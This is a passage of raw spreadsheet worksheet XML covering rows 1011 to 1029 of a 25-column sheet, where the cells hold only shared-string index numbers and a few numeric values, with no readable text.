      <c r="E1011" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F1011" s="12" t="s">
        <v>29189</v>
      </c>
      <c r="G1011" s="12" t="s">
        <v>7548</v>
      </c>
      <c r="H1011" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1011" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1011" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K1011" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1011" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1011" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1011" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1011" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1011" s="12" t="s">
        <v>7260</v>
      </c>
      <c r="Q1011" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R1011" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1011" s="12" t="s">
        <v>7549</v>
      </c>
      <c r="T1011" s="12" t="s">
        <v>7550</v>
      </c>
      <c r="U1011" s="12" t="s">
        <v>7551</v>
      </c>
      <c r="V1011" s="12" t="s">
        <v>7091</v>
      </c>
      <c r="W1011" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1011" s="12">
        <v>4</v>
      </c>
      <c r="Y1011" s="12" t="s">
        <v>7552</v>
      </c>
    </row>
    <row r="1012" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1012" s="12">
        <v>5284</v>
      </c>
      <c r="B1012" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C1012" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D1012" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F1012" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G1012" s="12" t="s">
        <v>7553</v>
      </c>
      <c r="H1012" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1012" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1012" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1012" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1012" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M1012" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1012" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1012" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1012" s="12" t="s">
        <v>7554</v>
      </c>
      <c r="Q1012" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R1012" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1012" s="12" t="s">
        <v>7555</v>
      </c>
      <c r="T1012" s="12" t="s">
        <v>4481</v>
      </c>
      <c r="U1012" s="12" t="s">
        <v>7556</v>
      </c>
      <c r="V1012" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W1012" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1012" s="12">
        <v>1</v>
      </c>
      <c r="Y1012" s="12" t="s">
        <v>7557</v>
      </c>
    </row>
    <row r="1013" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1013" s="12">
        <v>5288</v>
      </c>
      <c r="B1013" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1013" s="12" t="s">
        <v>29197</v>
      </c>
      <c r="E1013" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1013" s="12" t="s">
        <v>29189</v>
      </c>
      <c r="G1013" s="12" t="s">
        <v>7563</v>
      </c>
      <c r="H1013" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1013" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1013" s="12" t="s">
        <v>1943</v>
      </c>
      <c r="K1013" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1013" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1013" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1013" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1013" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1013" s="12" t="s">
        <v>7564</v>
      </c>
      <c r="Q1013" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1013" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1013" s="12" t="s">
        <v>7565</v>
      </c>
      <c r="T1013" s="12" t="s">
        <v>5847</v>
      </c>
      <c r="U1013" s="12" t="s">
        <v>7566</v>
      </c>
      <c r="V1013" s="12" t="s">
        <v>1388</v>
      </c>
      <c r="W1013" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1013" s="12">
        <v>7</v>
      </c>
      <c r="Y1013" s="12" t="s">
        <v>7567</v>
      </c>
    </row>
    <row r="1014" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1014" s="12">
        <v>5292</v>
      </c>
      <c r="B1014" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1014" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1014" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1014" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1014" s="12" t="s">
        <v>29234</v>
      </c>
      <c r="G1014" s="12" t="s">
        <v>7568</v>
      </c>
      <c r="H1014" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1014" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1014" s="12" t="s">
        <v>270</v>
      </c>
      <c r="K1014" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1014" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1014" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1014" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1014" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1014" s="12" t="s">
        <v>7484</v>
      </c>
      <c r="Q1014" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1014" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1014" s="12" t="s">
        <v>7569</v>
      </c>
      <c r="T1014" s="12" t="s">
        <v>6113</v>
      </c>
      <c r="U1014" s="12" t="s">
        <v>7570</v>
      </c>
      <c r="V1014" s="12" t="s">
        <v>274</v>
      </c>
      <c r="W1014" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1014" s="12">
        <v>1</v>
      </c>
      <c r="Y1014" s="12" t="s">
        <v>7571</v>
      </c>
    </row>
    <row r="1015" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1015" s="12">
        <v>5298</v>
      </c>
      <c r="B1015" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1015" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1015" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F1015" s="12" t="s">
        <v>29189</v>
      </c>
      <c r="G1015" s="12" t="s">
        <v>7574</v>
      </c>
      <c r="H1015" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1015" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1015" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K1015" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1015" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1015" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1015" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1015" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1015" s="12" t="s">
        <v>7575</v>
      </c>
      <c r="Q1015" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1015" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1015" s="12" t="s">
        <v>7576</v>
      </c>
      <c r="T1015" s="12" t="s">
        <v>5847</v>
      </c>
      <c r="U1015" s="12" t="s">
        <v>7577</v>
      </c>
      <c r="V1015" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W1015" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1015" s="12">
        <v>4</v>
      </c>
      <c r="Y1015" s="12" t="s">
        <v>7578</v>
      </c>
    </row>
    <row r="1016" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1016" s="12">
        <v>5312</v>
      </c>
      <c r="B1016" s="12" t="s">
        <v>29194</v>
      </c>
      <c r="D1016" s="12" t="s">
        <v>29209</v>
      </c>
      <c r="E1016" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1016" s="12" t="s">
        <v>29189</v>
      </c>
      <c r="G1016" s="12" t="s">
        <v>7585</v>
      </c>
      <c r="H1016" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1016" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1016" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K1016" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1016" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1016" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1016" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1016" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1016" s="12" t="s">
        <v>7260</v>
      </c>
      <c r="Q1016" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R1016" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1016" s="12" t="s">
        <v>7586</v>
      </c>
      <c r="T1016" s="12" t="s">
        <v>7587</v>
      </c>
      <c r="U1016" s="12" t="s">
        <v>7588</v>
      </c>
      <c r="V1016" s="12" t="s">
        <v>7589</v>
      </c>
      <c r="W1016" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1016" s="12">
        <v>17</v>
      </c>
      <c r="Y1016" s="12" t="s">
        <v>7590</v>
      </c>
    </row>
    <row r="1017" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1017" s="12">
        <v>5320</v>
      </c>
      <c r="B1017" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1017" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1017" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1017" s="12" t="s">
        <v>29189</v>
      </c>
      <c r="G1017" s="12" t="s">
        <v>7598</v>
      </c>
      <c r="H1017" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1017" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1017" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1017" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1017" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1017" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1017" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1017" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1017" s="12" t="s">
        <v>7599</v>
      </c>
      <c r="Q1017" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1017" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1017" s="12" t="s">
        <v>7600</v>
      </c>
      <c r="T1017" s="12" t="s">
        <v>7601</v>
      </c>
      <c r="U1017" s="12" t="s">
        <v>7602</v>
      </c>
      <c r="V1017" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1017" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1017" s="12">
        <v>6</v>
      </c>
      <c r="Y1017" s="12" t="s">
        <v>7603</v>
      </c>
    </row>
    <row r="1018" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1018" s="12">
        <v>5330</v>
      </c>
      <c r="B1018" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D1018" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1018" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1018" s="12" t="s">
        <v>7618</v>
      </c>
      <c r="H1018" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1018" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1018" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1018" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1018" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1018" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1018" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1018" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1018" s="12" t="s">
        <v>7619</v>
      </c>
      <c r="Q1018" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1018" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1018" s="12" t="s">
        <v>7620</v>
      </c>
      <c r="T1018" s="12" t="s">
        <v>7621</v>
      </c>
      <c r="U1018" s="12" t="s">
        <v>7622</v>
      </c>
      <c r="V1018" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W1018" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1018" s="12">
        <v>9</v>
      </c>
      <c r="Y1018" s="12" t="s">
        <v>7623</v>
      </c>
    </row>
    <row r="1019" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1019" s="12">
        <v>5337</v>
      </c>
      <c r="B1019" s="12" t="s">
        <v>29235</v>
      </c>
      <c r="C1019" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1019" s="12" t="s">
        <v>29202</v>
      </c>
      <c r="F1019" s="12" t="s">
        <v>29197</v>
      </c>
      <c r="G1019" s="12" t="s">
        <v>7633</v>
      </c>
      <c r="H1019" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1019" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1019" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K1019" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1019" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1019" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1019" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1019" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1019" s="12" t="s">
        <v>7619</v>
      </c>
      <c r="Q1019" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1019" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1019" s="12" t="s">
        <v>7634</v>
      </c>
      <c r="T1019" s="12" t="s">
        <v>7227</v>
      </c>
      <c r="U1019" s="12" t="s">
        <v>7635</v>
      </c>
      <c r="V1019" s="12" t="s">
        <v>5649</v>
      </c>
      <c r="W1019" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1019" s="12">
        <v>11</v>
      </c>
      <c r="Y1019" s="12" t="s">
        <v>7636</v>
      </c>
    </row>
    <row r="1020" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1020" s="12">
        <v>5351</v>
      </c>
      <c r="B1020" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1020" s="12" t="s">
        <v>29236</v>
      </c>
      <c r="E1020" s="13" t="s">
        <v>31439</v>
      </c>
      <c r="F1020" s="12" t="s">
        <v>29236</v>
      </c>
      <c r="G1020" s="12" t="s">
        <v>7648</v>
      </c>
      <c r="H1020" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1020" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1020" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K1020" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1020" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1020" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1020" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1020" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1020" s="12" t="s">
        <v>7649</v>
      </c>
      <c r="Q1020" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1020" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1020" s="12" t="s">
        <v>7650</v>
      </c>
      <c r="T1020" s="12" t="s">
        <v>4772</v>
      </c>
      <c r="U1020" s="12" t="s">
        <v>7651</v>
      </c>
      <c r="V1020" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W1020" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1020" s="12">
        <v>19</v>
      </c>
      <c r="Y1020" s="12" t="s">
        <v>7652</v>
      </c>
    </row>
    <row r="1021" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1021" s="12">
        <v>5352</v>
      </c>
      <c r="B1021" s="12" t="s">
        <v>29213</v>
      </c>
      <c r="D1021" s="12" t="s">
        <v>29195</v>
      </c>
      <c r="F1021" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1021" s="12" t="s">
        <v>7653</v>
      </c>
      <c r="H1021" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1021" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1021" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1021" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1021" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1021" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1021" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1021" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1021" s="12" t="s">
        <v>7654</v>
      </c>
      <c r="Q1021" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1021" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1021" s="12" t="s">
        <v>7655</v>
      </c>
      <c r="T1021" s="12" t="s">
        <v>84</v>
      </c>
      <c r="U1021" s="12" t="s">
        <v>7656</v>
      </c>
      <c r="V1021" s="12" t="s">
        <v>3883</v>
      </c>
      <c r="W1021" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1021" s="12">
        <v>1</v>
      </c>
      <c r="Y1021" s="12" t="s">
        <v>7657</v>
      </c>
    </row>
    <row r="1022" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1022" s="12">
        <v>5354</v>
      </c>
      <c r="B1022" s="12" t="s">
        <v>29237</v>
      </c>
      <c r="D1022" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1022" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1022" s="12" t="s">
        <v>7658</v>
      </c>
      <c r="H1022" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1022" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1022" s="12" t="s">
        <v>403</v>
      </c>
      <c r="K1022" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1022" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1022" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1022" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1022" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1022" s="12" t="s">
        <v>7260</v>
      </c>
      <c r="Q1022" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R1022" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1022" s="12" t="s">
        <v>7659</v>
      </c>
      <c r="T1022" s="12" t="s">
        <v>6785</v>
      </c>
      <c r="U1022" s="12" t="s">
        <v>7660</v>
      </c>
      <c r="V1022" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W1022" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1022" s="12">
        <v>2</v>
      </c>
      <c r="Y1022" s="12" t="s">
        <v>7661</v>
      </c>
    </row>
    <row r="1023" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1023" s="12">
        <v>5359</v>
      </c>
      <c r="B1023" s="12" t="s">
        <v>29194</v>
      </c>
      <c r="D1023" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1023" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1023" s="12" t="s">
        <v>29202</v>
      </c>
      <c r="G1023" s="12" t="s">
        <v>7664</v>
      </c>
      <c r="H1023" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1023" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1023" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K1023" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1023" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1023" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1023" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1023" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1023" s="12">
        <v>2.6</v>
      </c>
      <c r="Q1023" s="12">
        <v>2.6</v>
      </c>
      <c r="R1023" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1023" s="12" t="s">
        <v>7665</v>
      </c>
      <c r="T1023" s="12" t="s">
        <v>7609</v>
      </c>
      <c r="U1023" s="12" t="s">
        <v>7666</v>
      </c>
      <c r="V1023" s="12" t="s">
        <v>7609</v>
      </c>
      <c r="W1023" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1023" s="12">
        <v>5</v>
      </c>
      <c r="Y1023" s="12" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="1024" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1024" s="12">
        <v>5360</v>
      </c>
      <c r="B1024" s="12" t="s">
        <v>29184</v>
      </c>
      <c r="D1024" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1024" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1024" s="12" t="s">
        <v>29238</v>
      </c>
      <c r="G1024" s="12" t="s">
        <v>7667</v>
      </c>
      <c r="H1024" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1024" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1024" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K1024" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1024" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1024" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1024" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1024" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1024" s="12">
        <v>2.6</v>
      </c>
      <c r="Q1024" s="12">
        <v>2.6</v>
      </c>
      <c r="R1024" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1024" s="12" t="s">
        <v>7668</v>
      </c>
      <c r="T1024" s="12" t="s">
        <v>7609</v>
      </c>
      <c r="U1024" s="12" t="s">
        <v>3190</v>
      </c>
      <c r="V1024" s="12" t="s">
        <v>7609</v>
      </c>
      <c r="W1024" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1024" s="12">
        <v>5</v>
      </c>
      <c r="Y1024" s="12" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="1025" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1025" s="12">
        <v>5361</v>
      </c>
      <c r="B1025" s="12" t="s">
        <v>29213</v>
      </c>
      <c r="D1025" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1025" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1025" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1025" s="12" t="s">
        <v>7669</v>
      </c>
      <c r="H1025" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1025" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1025" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K1025" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1025" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1025" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1025" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1025" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1025" s="12">
        <v>2.6</v>
      </c>
      <c r="Q1025" s="12">
        <v>2.6</v>
      </c>
      <c r="R1025" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1025" s="12" t="s">
        <v>7670</v>
      </c>
      <c r="T1025" s="12" t="s">
        <v>7609</v>
      </c>
      <c r="U1025" s="12" t="s">
        <v>2432</v>
      </c>
      <c r="V1025" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W1025" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1025" s="12">
        <v>4</v>
      </c>
      <c r="Y1025" s="12" t="s">
        <v>7615</v>
      </c>
    </row>
    <row r="1026" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1026" s="12">
        <v>5365</v>
      </c>
      <c r="B1026" s="12" t="s">
        <v>29239</v>
      </c>
      <c r="C1026" s="12" t="s">
        <v>29240</v>
      </c>
      <c r="D1026" s="12" t="s">
        <v>29189</v>
      </c>
      <c r="F1026" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1026" s="12" t="s">
        <v>7676</v>
      </c>
      <c r="H1026" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1026" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1026" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1026" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1026" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1026" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1026" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1026" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1026" s="12" t="s">
        <v>7329</v>
      </c>
      <c r="Q1026" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1026" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1026" s="12" t="s">
        <v>7677</v>
      </c>
      <c r="T1026" s="12" t="s">
        <v>399</v>
      </c>
      <c r="U1026" s="12" t="s">
        <v>7678</v>
      </c>
      <c r="V1026" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W1026" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1026" s="12">
        <v>11</v>
      </c>
      <c r="Y1026" s="12" t="s">
        <v>7679</v>
      </c>
    </row>
    <row r="1027" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1027" s="12">
        <v>5366</v>
      </c>
      <c r="B1027" s="12" t="s">
        <v>29241</v>
      </c>
      <c r="C1027" s="12" t="s">
        <v>29242</v>
      </c>
      <c r="D1027" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1027" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F1027" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1027" s="12" t="s">
        <v>7680</v>
      </c>
      <c r="H1027" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1027" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J1027" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1027" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1027" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M1027" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1027" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1027" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1027" s="12" t="s">
        <v>3692</v>
      </c>
      <c r="Q1027" s="12" t="s">
        <v>28266</v>
      </c>
      <c r="R1027" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1027" s="12" t="s">
        <v>7681</v>
      </c>
      <c r="T1027" s="12" t="s">
        <v>7332</v>
      </c>
      <c r="U1027" s="12" t="s">
        <v>7682</v>
      </c>
      <c r="V1027" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W1027" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1027" s="12">
        <v>16</v>
      </c>
      <c r="Y1027" s="12" t="s">
        <v>7683</v>
      </c>
    </row>
    <row r="1028" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1028" s="12">
        <v>5368</v>
      </c>
      <c r="B1028" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1028" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1028" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1028" s="12" t="s">
        <v>7684</v>
      </c>
      <c r="H1028" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1028" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1028" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1028" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1028" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1028" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1028" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1028" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1028" s="12" t="s">
        <v>7575</v>
      </c>
      <c r="Q1028" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1028" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1028" s="12" t="s">
        <v>7685</v>
      </c>
      <c r="T1028" s="12" t="s">
        <v>7686</v>
      </c>
      <c r="U1028" s="12" t="s">
        <v>7687</v>
      </c>
      <c r="V1028" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1028" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1028" s="12">
        <v>4</v>
      </c>
      <c r="Y1028" s="12" t="s">
        <v>7688</v>
      </c>
    </row>
    <row r="1029" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1029" s="12">
        <v>5411</v>
      </c>
      <c r="B1029" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1029" s="12" t="s">
        <v>29243</v>
      </c>
      <c r="E1029" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1029" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1029" s="12" t="s">
        <v>7712</v>
      </c>
      <c r="H1029" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1029" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1029" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1029" s="12" t="s">
